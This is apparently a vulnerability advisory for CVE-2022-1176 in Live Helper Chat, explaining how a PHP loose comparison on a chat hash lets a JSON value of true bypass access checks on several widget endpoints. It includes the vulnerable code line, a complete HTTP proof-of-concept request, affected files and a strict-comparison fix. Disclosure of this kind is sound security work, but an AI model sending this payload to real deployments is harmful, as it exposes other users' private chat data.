CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat

Description

Live Helper Chat is vulnerable to Type Juggling on the requestPayload['hash']. The application uses a Loose Comparison to check if the user-controlled parameter is equal to an hash, this check is vulnerable because it’s possible to pass other Data Types via JSON that causes the if condition to be True. This occurs on multiple endpoints.

Proof of Concept

For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc_web/modules/lhwidgetrestapi/fetchmessage.php#L19

    if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])

1. Request

   POST /eng/widgetrestapi/fetchmessages HTTP/1.1 Host: demo.livehelperchat.com Cookie: lhc_vid=eb9bc0c044919538c5b1 Content-Length: 62 Sec-Ch-Ua: "(Not(A:Brand";v="8", “Chromium";v="99” Accept: application/json, text/plain, / Content-Type: application/x-www-form-urlencoded Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Sec-Ch-Ua-Platform: “macOS” Origin: https://demo.livehelperchat.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.livehelperchat.com/ Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close

   {"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}

Note the "hash":true, this will make the if always return True.

The loose comparison can be solved by using a type safe check === or updating PHP to 8 <=.

I’ve attached more occurrences of the same vulnerability: modules/lhwidgetrestapi/fetchmessage.php modules/lhwidgetrestapi/fetchmessages.php modules/lhwidgetrestapi/getmessagesnippet.php modules/lhwidgetrestapi/initchat.php modules/lhwidgetrestapi/uisettings.php

Impact

It’s possible to bypass multiple checks. An attacker could access private information of other users.

Occurrences